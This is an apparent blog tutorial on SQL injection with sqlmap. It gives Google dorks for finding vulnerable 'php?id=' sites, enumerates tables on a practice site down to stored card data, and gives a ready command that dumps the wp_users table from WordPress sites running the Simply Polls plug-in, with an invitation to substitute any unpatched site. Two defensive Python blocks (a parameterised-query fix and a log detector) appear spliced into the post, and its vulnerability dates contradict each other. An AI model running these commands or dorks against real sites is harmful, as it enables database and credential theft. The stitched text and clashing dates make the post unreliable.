alvin gitonga

Sqlmap 😈: Hacking MySQL & WordPress Sites 😉 with SQL Injection 💉

Updated: Nov 30, 2022

CyberMorans 🤗

SQL Injection 💉 is one of the most prevalent and common attacks on websites. Nearly every website has a database behind it containing confidential and valuable information 🧐 that can often be compromised by a well-designed SQL injection attack 😈

There are tonnes of SQL injection tools, but the most popular is sqlmap. In this tutorial, we will use sqlmap to compromise a MySQL database behind a website 😋

Generally, MySQL is teamed up with PHP and an Apache web server (often referred to as LAMP) to build dynamic, database-driven web sites 😋. Content management systems and development frameworks such as Drupal, Joomla, WordPress, Ruby on Rails and others use MySQL as their default backend database. Millions of websites have MySQL backends, and very often they are "homegrown" websites built without much attention to security.

In this post, we look at gathering information about an online MySQL database before we actually extract data from it.


Sqlmap can be used against databases other than MySQL, such as Microsoft's SQL Server and Oracle, but here we will focus its capabilities on those ubiquitous web sites built with PHP, Apache and MySQL, such as WordPress, Joomla and Drupal 🧐


So, Morans, let's ndu THIS!... 💪



Start sqlmap 🚀

First, fire up Kali and go to Applications > Database Assessment > sqlmap. When you click on sqlmap, you see 👇


🚀 Find a Vulnerable Website 🧐

To get into the website and, ultimately, the database, we are looking for web sites whose URLs end in "php?id=xxx", where xxx represents some number. If you are familiar with Google hacks/dorks, you can do a search on Google by entering:

  • inurl:index.php?id=

  • inurl:gallery.php?id=

  • inurl:post.php?id=

  • inurl:article?id=

These 👆 dorks will bring up millions of web sites matching this basic vulnerability criterion. If you are creative and ambitious, you can find numerous web sites that list vulnerable web sites. You might want to check these out 😉
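What makes such a "php?id=" page injectable is the server-side handler, not the shape of the URL. The following is an added example (not code from the post or from webscantest.com): it uses Python's sqlite3 as a stand-in for the PHP/MySQL handler behind a URL like search_get_by_id.php?id=4, with a constructed inventory table, and shows the string-concatenated query beside the validated, parameterised fix.

```python
"""Why an unvalidated ``?id=`` parameter is injectable, and the fix.

Added example, not code from the post or from webscantest.com. Python's
sqlite3 stands in for the PHP/MySQL handler behind a URL such as
``search_get_by_id.php?id=4``; the inventory table and rows are constructed.
"""
import sqlite3

def make_db():
    """Constructed sample data standing in for a shop's inventory table."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE inventory (id INTEGER, name TEXT, price REAL)")
    conn.executemany("INSERT INTO inventory VALUES (?, ?, ?)",
                     [(1, "widget", 9.99), (2, "gadget", 19.99),
                      (3, "gizmo", 29.99), (4, "doohickey", 39.99)])
    return conn

def lookup_vulnerable(conn, raw_id):
    """The pattern the dorks above find: the request parameter is pasted into
    the SQL text, so whatever follows the number is parsed as SQL."""
    sql = f"SELECT id, name FROM inventory WHERE id = {raw_id}"
    return conn.execute(sql).fetchall()

def lookup_hardened(conn, raw_id):
    """Validate the type the application expects, then bind the value as a
    parameter so the driver never treats it as SQL syntax."""
    if not raw_id.isdigit():
        raise ValueError("id must be a non-negative integer")
    return conn.execute("SELECT id, name FROM inventory WHERE id = ?",
                        (int(raw_id),)).fetchall()

def demo():
    """Run both handlers on a normal id and on a constructed tautology payload."""
    conn = make_db()
    normal, tautology = "4", "4 OR 1=1"
    result = {
        "vuln_normal": lookup_vulnerable(conn, normal),
        "vuln_tautology": lookup_vulnerable(conn, tautology),   # leaks every row
        "safe_normal": lookup_hardened(conn, normal),
    }
    try:
        lookup_hardened(conn, tautology)
        result["safe_tautology"] = "accepted"
    except ValueError:
        result["safe_tautology"] = "rejected"
    return result
```

The vulnerable handler returns the whole table for the tautology input, while the hardened one rejects it before any SQL runs; the same two fixes (type validation plus prepared statements) apply to the PHP/MySQL code behind real "php?id=" pages.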


For our purposes, we will be hacking a website designed for exactly this, www.webscantest.com. You can practice on this web site and refine your skills without worrying about breaking any laws and selling a plot to make bail money 🤣


Sqlmap is a powerful tool written in Python, with a great many options. We will just be scratching the surface of its capabilities in this proof of concept 🤭


🚀 Determine the DBMS Behind the Website 🧐

Before we begin hacking a web site, we need to gather information.


Let's begin by finding out what the DBMS is behind this web site.

On the terminal, type 👇

sqlmap -u "the entire URL of the vulnerable web page"

thus 👇

sqlmap -u "http://www.webscantest.com/datastore/search_get_by_id.php?id=4"

PS: The entire URL is enclosed in double quotation marks (") 👇

sqlmap returns results like those below 👇. Notice the highlighted line showing that the web site's backend is MySQL 5.0 👇


🚀 Find the Database 🧐

Now that we know the database management system (DBMS) is MySQL 5.0, we need to know what databases it contains. sqlmap can do that. We take the command used above and append --dbs to it, like so 👇

sqlmap -u "http://www.webscantest.com/datastore/search_get_by_id.php?id=4" --dbs

Running this command against www.webscantest.com, we get results like 👇

Notice the two available databases, information_schema and webscantest. information_schema is included in every MySQL installation and holds metadata on all the objects in the MySQL instance, but not the data we are interested in. Although it can be useful to explore that database to find objects across all the databases in the instance, our attention here is on the other database, webscantest, which may hold some valuable information. Let's dig a little further 😋


🚀 Digging More Info from the Database 🧐

So, we know the DBMS (MySQL 5.0) and the name of a database of interest (webscantest). The next step is to try to determine the tables and columns in that database. In this way, we will have some idea of:

  1. what data is in the database,

  2. where it is and

  3. which type of data it contains (numeric or string).


All of this 👆 information is critical and necessary for extracting the data. To get it, we make some small edits to our sqlmap command. Everything we used above stays the same, but now we tell sqlmap we want to see the tables and columns of the webscantest database.


We append --columns -D and the name of the database, webscantest, to our command, like so 👇


sqlmap -u "http://www.webscantest.com/datastore/search_get_by_id.php?id=4" --dbs --columns -D webscantest

Sqlmap 👆 will target the webscantest database and attempt to enumerate its tables and columns. As you can see below, sqlmap successfully enumerated three tables:

  1. accounts,

  2. inventory, and

  3. orders, complete with column names and datatypes.

Not bad, eeh! 👇


See 👆 that the orders table above includes credit card numbers, expiration dates and CVVs 🤯 In the next one, I'll show you how to extract that information 💀


🤖 Complex/Modern sqlmap Attack on WordPress Sites ☠️

A more advanced use of this tool: in December 2016, a security researcher (Tad Group) found a vulnerability enabling an advanced SQL injection attack against WordPress websites that include the Simply Polls plug-in (https://wordpress.org/plugins/simply-polls/).


Since this attack was only recently released (2021) and millions of users have not yet patched, most of these sites are vulnerable 😨


The sqlmap command to exploit WordPress sites running the Simply Polls plug-in is 👇

sqlmap -u "http://example.com/wp-admin/admin-ajax.php" --data="action=spAjaxResults&pollid=2" --dump -T wp_users -D wordpress --threads=10 --random-agent --dbms=mysql --level=5 --risk=3

Replace "example.com" with the URL of the vulnerable website.
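From the defender's side, two flags in that command matter for detection: --random-agent replaces sqlmap's default User-Agent, so UA matching alone misses the run, and --threads=10 produces a burst of similar requests from one client. The following added example (not from the post) scores constructed Apache combined-format access log lines on three signals: the default sqlmap User-Agent, SQL keywords in the URL-decoded request, and per-client request bursts. Note that POST bodies such as --data never appear in access logs, so that case needs WAF or application-level logging instead.

```python
"""Spot a sqlmap-style enumeration run in constructed Apache access log lines.
Added example, not from the post; log lines, IPs and UA strings are constructed."""
import re
from collections import Counter
from urllib.parse import unquote_plus

LOG_RE = re.compile(r'^(\S+) \S+ \S+ \[[^\]]+\] "\S+ (\S+) [^"]*" \d{3} \S+ "[^"]*" "([^"]*)"')
SQL_MARKERS = re.compile(
    r"union\s+(all\s+)?select|information_schema|\bsleep\s*\(|\bbenchmark\s*\(|"
    r"\b(and|or)\s+\d+\s*=\s*\d+|@@version", re.IGNORECASE)

def parse(line):
    """Return (client_ip, decoded_path, user_agent) or None for a malformed line."""
    m = LOG_RE.match(line)
    return (m.group(1), unquote_plus(m.group(2)), m.group(3)) if m else None

def classify(lines, burst_threshold=5):
    """Return {client_ip: set(reasons)} for clients showing at least one signal."""
    reasons_by_ip, count_by_ip = {}, Counter()
    for line in lines:
        rec = parse(line)
        if rec is None:
            continue
        ip, path, ua = rec
        count_by_ip[ip] += 1
        reasons = reasons_by_ip.setdefault(ip, set())
        if "sqlmap" in ua.lower():          # default UA; absent with --random-agent
            reasons.add("sqlmap user-agent")
        if SQL_MARKERS.search(path):         # payload survives UA randomisation
            reasons.add("sql keywords in request")
    for ip, n in count_by_ip.items():
        if n >= burst_threshold:             # --threads=10 style request bursts
            reasons_by_ip[ip].add(f"burst of {n} requests")
    return {ip: r for ip, r in reasons_by_ip.items() if r}

def log_line(ip, sec, path, ua):
    """Build one constructed Apache combined-format line (sample data, not a real log)."""
    return f'{ip} - - [30/Nov/2022:10:00:{sec:02d} +0000] "GET {path} HTTP/1.1" 200 512 "-" "{ua}"'

UA_BROWSER = "Mozilla/5.0 (X11; Linux x86_64) Firefox/107.0"
SCANNER = "203.0.113.5"   # constructed: one scanning client, two ordinary visitors below
SAMPLE_LOG = [
    log_line(SCANNER, 1, "/datastore/search_get_by_id.php?id=4", "sqlmap/1.6#stable (https://sqlmap.org)"),
    log_line(SCANNER, 1, "/datastore/search_get_by_id.php?id=4%20AND%201%3D1", UA_BROWSER),
    log_line(SCANNER, 2, "/datastore/search_get_by_id.php?id=4%20UNION%20ALL%20SELECT%20NULL%2CNULL", UA_BROWSER),
    log_line(SCANNER, 2, "/datastore/search_get_by_id.php?id=4%20AND%20SLEEP(5)", UA_BROWSER),
    log_line(SCANNER, 8, "/datastore/search_get_by_id.php?id=-1%20UNION%20SELECT%201%20FROM%20information_schema.tables", UA_BROWSER),
    log_line("198.51.100.7", 9, "/datastore/search_get_by_id.php?id=4", UA_BROWSER),
    log_line("192.0.2.9", 10, "/index.php?id=7", UA_BROWSER),
]
```

Only the scanning client is flagged, on all three signals, while the two visitors requesting plain numeric ids are left alone; the keyword and burst signals are what keep firing once --random-agent hides the User-Agent.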

Sqlmap can be a very versatile and useful tool for MySQL, as well as MS SQL Server and Oracle database hacking 🥶


For the next part, we extract this data from the db. Don't miss it... click here to proceed to part 2 😋



Conclusion 🤖

Subscribe to receive notifications of similar posts 😋 where we will be reverse engineering malware, looking at the technical aspects of vulnerabilities and how an attacker may use a vulnerability as an attack vector, and covering other infosec stuff... 😋


Morans,

Thank you for your time. Like and leave a comment/review and, as always, stay awesome! 😋👊 💪
